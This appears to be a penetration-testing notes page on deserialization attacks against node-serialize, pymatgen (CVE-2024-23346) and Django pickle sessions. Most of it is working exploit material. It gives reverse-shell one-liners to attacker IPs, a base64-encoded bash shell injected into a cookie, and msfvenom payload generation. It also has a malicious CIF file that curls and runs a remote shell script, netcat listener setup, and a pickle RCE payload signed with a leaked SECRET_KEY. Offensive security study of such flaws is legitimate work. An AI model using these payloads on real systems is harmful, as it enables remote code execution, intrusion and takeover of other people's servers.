Edit

Deserialization

Deserialization vulnerability occurs when untrusted data is deserialized, allowing attackers to execute arbitrary code or manipulate the application’s behavior.

nodejs

  • Install node-serialize:

npm install node-serialize

nodejsshell.py Method:

  1. Create the node reverse shell:

python3 nodejsshell.py 10.10.16.8 4444

  1. Once you have a serialized reverse shell, add it to this function:

var y = {
  rce: function(){ADD/THE/PAYLOAD/HERE}
}
var serialize = require('node-serialize');
var s = serialize.serialize(y)
console.log("Serialized: \n" + s.slice(0,-2) + "()" + s.slice(-2,));

  1. Now serialize convert to base64 the exploit using:

node exploit.js | tail -n +2 | base64 -w0

  • msfvenom also has a module to generate payloads:

msfvenom -p nodejs/shell_reverse_tcp LHOST=10.10.14.10 LPORT=1337 -o shell.js

  • Another way is to get command execution is by using this function:

{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('ls /',
function(error, stdout, stderr) { console.log(stdout) });}()"}

  • We can generate a reverse shell out of this by encoding the command first to base64: 

echo 'bash -i >& /dev/tcp/10.10.16.8/4444 0>&1' | base64

  • Now add that string to the function like this:

{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi44LzQ0NDQgMD4mMQo=|base64 -d|bash',
function(error, stdout, stderr) { console.log(stdout) });}()"}

  • Now URL encode the payload and add it to the cookie.

Pymatgen

  • Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis.

CVE-2024-23346

  • A critical security vulnerability exists in the JonesFaithfulTransformation.from_transformation_str() method.

  • This method insecurely utilizes eval() for processing input, enabling execution of arbitrary code when parsing untrusted input.

Version: prior to 2024.2.20

Poc

  • There is a security advisory in GitHub about Arbitrary code execution when parsing files:

Example
data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution
Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( * [().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("curl http://185.107.57.7:9000/shell.sh|sh");0,0,0'
_space_group_magn.number_BNS 62.448

  • Create the reverse shell:

echo -ne '#!/bin/bash\n/bin/bash -c "/bin/bash -i >& /dev/tcp/185.107.57.7/9001
0>&1"' > shell.sh

  • Then start a Python web server to host our newly created payload:

sudo python3 -m http.server 9000

  • Run the listener:

nc -lvnp 9001

  • Upload the malicious CIF file and view to trigger the reverse shell.

Django Deserialization

Documentation

  • Identify if debug mode or error reporting is enabled.

  • Look for endpoints or parameters that accept serialized data.

  • Check error messages or debug info for SECRET_KEY exposure.

Use the leaked SECRET_KEY to sign a malicious serialized object
from django.core import signing
import pickle

class RCE(object):
    def __reduce__(self):
        import os
        return (os.system, ('id',))

payload = signing.dumps(pickle.dumps(RCE()))
print(payload)
Send the signed payload to the vulnerable endpoint
curl -b "session=<payload>" http://target/vulnerable_endpoint
PreviousLog PoisoningNextSSRF

Last updated